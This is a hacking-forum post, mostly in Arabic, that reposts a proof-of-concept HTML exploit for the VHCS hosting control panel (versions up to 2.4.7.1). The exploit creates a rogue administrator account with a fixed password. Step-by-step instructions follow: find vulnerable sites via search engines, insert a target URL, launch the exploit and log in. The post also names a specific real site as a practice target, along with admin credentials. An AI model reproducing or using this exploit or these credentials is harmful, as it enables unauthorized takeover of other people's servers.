taza-p0p
Vous souhaitez réagir à ce message ? Créez un compte en quelques clics ou connectez-vous pour continuer.

taza-p0p


 
AccueilRechercherDernières imagesS'enregistrerConnexion
-38%
Le deal à ne pas rater :
Promo Dyson : l’aspirateur Dyson V15 Detect à 499€ au lieu de ...
499 € 799 €
Voir le deal

 

 trou : vhcs

Aller en bas 
AuteurMessage





Date d'inscription : 31/12/1969

trou : vhcs Empty
MessageSujet: trou : vhcs   trou : vhcs EmptyLun 16 Oct - 9:13

بسم الله الرحمن الرحيم

اسم الثغره : تغرة Vhcs

ابحث في اى محرك بحث

www.google.com

عن كلمه
vhcs

<html>
<head>
<title>VHCS (version <= 2.4.7.1) PoC. By RoMaNSoFt</title>
<script>
function submitform()
{
if (document.admin_add_user.username.value==\'admin\')
{
alert(\'Learn to read before launching an exploit, script-kiddie!\');
exit();
}
document.admin_add_user.action=document.admin_add_user.target.value;
document.admin_add_user.submit();
}
</script>
</head>
<body>



VHCS (version <= 2.4.7.1) PoC. By RoMaNSoFt &#60roman&#64rs-labs.com&#62 [08.Feb.2006]



<form>






















Target URL
<input>
Username
<input> (should NOT exist)
Exploit it!

<input>
<input>
<input>
<input>
</form>




Quick instructions.-



1.- Enable JavaScript. Fill in the form with appropiate target URL (usually you will only need to replace &#60target&#62 string) and username.

2.- Remember not to use a probably existing username (such as \"admin\").

3.- Launch the exploit. If target system is vulnerable, a new VHCS admin user will be created ;-)

4.- You will be redirected to VHCS login page. Try to login with your brand new username.

5.- Ummm, I forgot it... The password is: dsrrocks.



More info (analysis, fix, etc).-



See RS-2006-1.





</body>
</html>

طبعا نلاحظ الكود بلغه html

اوك نناخد الكود وننسخه واحفظه بامتداد html

وغير كلمه <target>/ لاسم الموقع الى المصاب

وفى خانه Username خير باى اسم تبيه مثلا alsakr

بعد ذالك اضغط على كلمه Exploit it!

تلاحظ انك فى لوحه التحكم ويطلب منك اليوزر والباص

طبعا اليوز الى اعطينا اياه مثلا spectrum

والباص طبعا هوه dsrrocks

تلاحظه مكتوب بلثغره والف مبروك اصبحت فى لوحه التحكم

تقدروا تتطبقوا على فار التجارب

http://www.azirix.org/vhcs2/admin/index.php

admin: aboly

pasowed : dsrrocks

اعتقد ان ما فى اسهل من كده

واى استفسار
avec le prince de la nuit c'est le p0p
Revenir en haut Aller en bas
 
trou : vhcs
Revenir en haut 
Page 1 sur 1
 Sujets similaires
-
» un trou
» trou xss charhe

Permission de ce forum:Vous ne pouvez pas répondre aux sujets dans ce forum
taza-p0p :: الهكر-
Sauter vers: